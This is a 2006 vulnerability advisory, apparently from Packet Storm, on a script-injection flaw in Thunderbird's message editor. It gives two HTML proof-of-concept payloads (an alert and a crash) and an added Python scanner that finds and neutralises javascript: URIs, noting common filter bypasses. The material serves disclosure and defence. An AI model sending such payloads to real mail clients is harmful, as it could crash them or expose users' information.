mozThunDoS.txt

Mozilla Thunderbird Remote Code Execution & Denial of Service

Published 26 Feb 2006, reported by nono2357. Source: packetstorm (packetstormsecurity.com)

Mozilla Thunderbird : Remote Code Execution & Denial of Service
  
//----- Advisory  
  
  
Program : Mozilla Thunderbird  
Homepage : http://www.mozilla.com/thunderbird/  
Tested version : <= 1.0.7  
Found by : nono2357 at sysdream dot com  
This advisory : nono2357 at sysdream dot com  
Discovery date : 2006/01/28  
  
  
//----- Application description  
  
  
Full-Featured Email  
  
Simple to use, powerful, and customizable, Thunderbird is a full-featured  
email application. Thunderbird supports IMAP and POP mail protocols, as well  
as HTML mail formatting. Easily import your existing email accounts and  
messages. Built-in RSS capabilities, powerful quick search, spell check as you
type, global inbox, deleting attachments and advanced message filtering round
out Thunderbird's modern feature set.
  
  
//----- Description of vulnerability  
  
  
Thunderbird's WYSIWYG rendering engine (the HTML editor used to compose
messages) insufficiently filters JavaScript. A javascript: URL can be placed in
the SRC attribute of an IFRAME tag in an HTML message; it is executed when the
message is loaded into the editor (for instance when replying to the email),
even if JavaScript is disabled in the preferences. The "code execution" in the
title is therefore JavaScript running while the message is edited; as the
Impact section states, the outcome is information disclosure or a crash, not
native code execution.
  
  
//----- Proof Of Concept  
  
  
* Javascript execution :  
  
<html>  
<body>  
<iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>  
</body>  
</html>  
  
* Denial of service (application crash; the script writes into the parent,
i.e. the editor's own document, from inside the IFRAME) :

<html>
<body>
<iframe src="javascript:parent.document.write('Found by www.sysdream.com !')"></iframe>
</body>
</html>
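
The check the advisory says the editor lacked, as an added example (this is not sysdream's code and not Mozilla's filter): a parser-based scan for javascript: URIs in URL-bearing attributes, extended from IFRAME SRC to every URL attribute since any of them can hide a script URI, plus a neutraliser that rewrites them. Python's html.parser stands in for the mail client's parser; the attribute list and scheme list are assumptions, and the sample messages are constructed, the first one being the advisory's own proof of concept on a single line.

```python
# Added example, not the advisory's or Thunderbird's code. Attribute list,
# scheme list and sample inputs are assumptions / constructed samples.
import html
import re
from html.parser import HTMLParser

# Attributes whose value the client treats as a URL (assumed list).
URL_ATTRS = {"src", "href", "action", "data", "formaction", "background", "poster"}

# Schemes that execute script when loaded or navigated (assumed list).
SCRIPT_SCHEMES = ("javascript:", "vbscript:")

# Browsers strip ASCII controls and whitespace before reading a scheme, so
# "java\tscript:" and " JavaScript:" still run; strip them before comparing.
_CONTROL_WS = re.compile(r"[\x00-\x20\x7f]")


def is_script_uri(value: str) -> bool:
    """True if the attribute value resolves to a script scheme.

    The normalised copy (controls removed, lower-cased) is used only for the
    scheme test; the original value is left untouched.
    """
    return _CONTROL_WS.sub("", value).lower().startswith(SCRIPT_SCHEMES)


class ScriptUriFinder(HTMLParser):
    """Collect (tag, attribute, value) for each URL attribute holding a script URI.

    HTMLParser unescapes attribute values before handle_starttag runs, so an
    entity-encoded scheme such as &#106;avascript: is seen as javascript:.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:  # tag and attribute names arrive lower-cased
            if value is not None and name in URL_ATTRS and is_script_uri(value):
                self.hits.append((tag, name, value))


def find_script_uris(body: str):
    """Return the offending (tag, attribute, value) triples found in an HTML body."""
    parser = ScriptUriFinder()
    parser.feed(body)
    parser.close()
    return parser.hits


class ScriptUriNeutralizer(HTMLParser):
    """Re-serialise the body with every script URI replaced by about:blank.

    Re-serialising rather than patching the source text means no obfuscated
    copy of the original value can survive. Comments are dropped and text is
    re-escaped, so this targets message bodies, not pages with inline <style>.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def _render_attrs(self, attrs):
        parts = []
        for name, value in attrs:
            if value is None:
                parts.append(name)
                continue
            if name in URL_ATTRS and is_script_uri(value):
                value = "about:blank"  # element kept, so the layout is unchanged
            parts.append(f'{name}="{html.escape(value, quote=True)}"')
        return " " + " ".join(parts) if parts else ""

    def handle_starttag(self, tag, attrs):
        self.out.append(f"<{tag}{self._render_attrs(attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._render_attrs(attrs)}/>")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass  # a mail body needs no comments, and they can hide markup


def neutralize(body: str) -> str:
    """Return a copy of the HTML body in which no URL attribute holds a script URI."""
    parser = ScriptUriNeutralizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)


# The advisory's first proof of concept on one line (constructed sample input).
SAMPLE_POC = (
    '<html><body>'
    '<iframe src="javascript:alert(\'Found by www.sysdream.com !\')"></iframe>'
    '</body></html>'
)

if __name__ == "__main__":
    for tag, attr, value in find_script_uris(SAMPLE_POC):
        print(f"script URI in <{tag} {attr}>: {value!r}")
    print(neutralize(SAMPLE_POC))
```

The scheme test normalises before comparing because a filter that only looks for the literal string `javascript:` at the start of the raw attribute is trivially bypassed with leading whitespace, a tab inside the word, or a character reference; the finder and the neutraliser share that one check so they cannot disagree about what counts as a script URI.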
  
  
//----- Solution  
  
  
Upgrade to version 1.5.  
  
Download page : http://www.mozilla.com/thunderbird/all.html  
Direct link :  
http://ftp.mozilla.org/pub/mozilla.org/thunderbird/releases/1.5/  
  
  
//----- Impact  
  
  
Exploitation requires the recipient to edit the attacker's message (for
instance by replying to it). Successful exploitation may lead to information
disclosure (application version, platform, user emails, user preferences, ...)
or could crash the application.
  
  
//----- Credits  
  
  
http://www.sysdream.com  
nono2357 at sysdream dot com  
  
  
//----- Greetings  
  
  
crashfr & the hackademy ...  
  
  